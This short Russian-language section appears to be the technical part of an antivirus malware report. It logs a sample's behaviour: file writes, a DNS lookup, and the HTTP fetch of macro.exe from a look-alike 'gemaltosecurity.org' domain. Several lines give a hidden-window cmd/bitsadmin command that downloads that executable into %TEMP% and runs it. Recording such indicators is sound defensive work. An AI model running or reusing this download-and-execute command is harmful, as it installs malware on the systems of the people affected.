Техническая информация
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer dw /download /priority high http://gemaltosecurity.org/file/macro.exe %TEMP%\macro.exe & %TEMP%\macro.exe & exit
- %TEMP%\bitd0f4.tmp
- %TEMP%\bitd0f4.tmp
- %TEMP%\bitd0f4.tmp в %TEMP%\macro.exe
- 'ge####osecurity.org':80
- http://ge####osecurity.org/file/macro.exe
- DNS ASK ge####osecurity.org
- '<SYSTEM32>\cmd.exe' /c bitsadmin /transfer dw /download /priority high http://gemaltosecurity.org/file/macro.exe %TEMP%\macro.exe & %TEMP%\macro.exe & exit' (со скрытым окном)
- '<SYSTEM32>\bitsadmin.exe' /transfer dw /download /priority high http://gemaltosecurity.org/file/macro.exe %TEMP%\macro.exe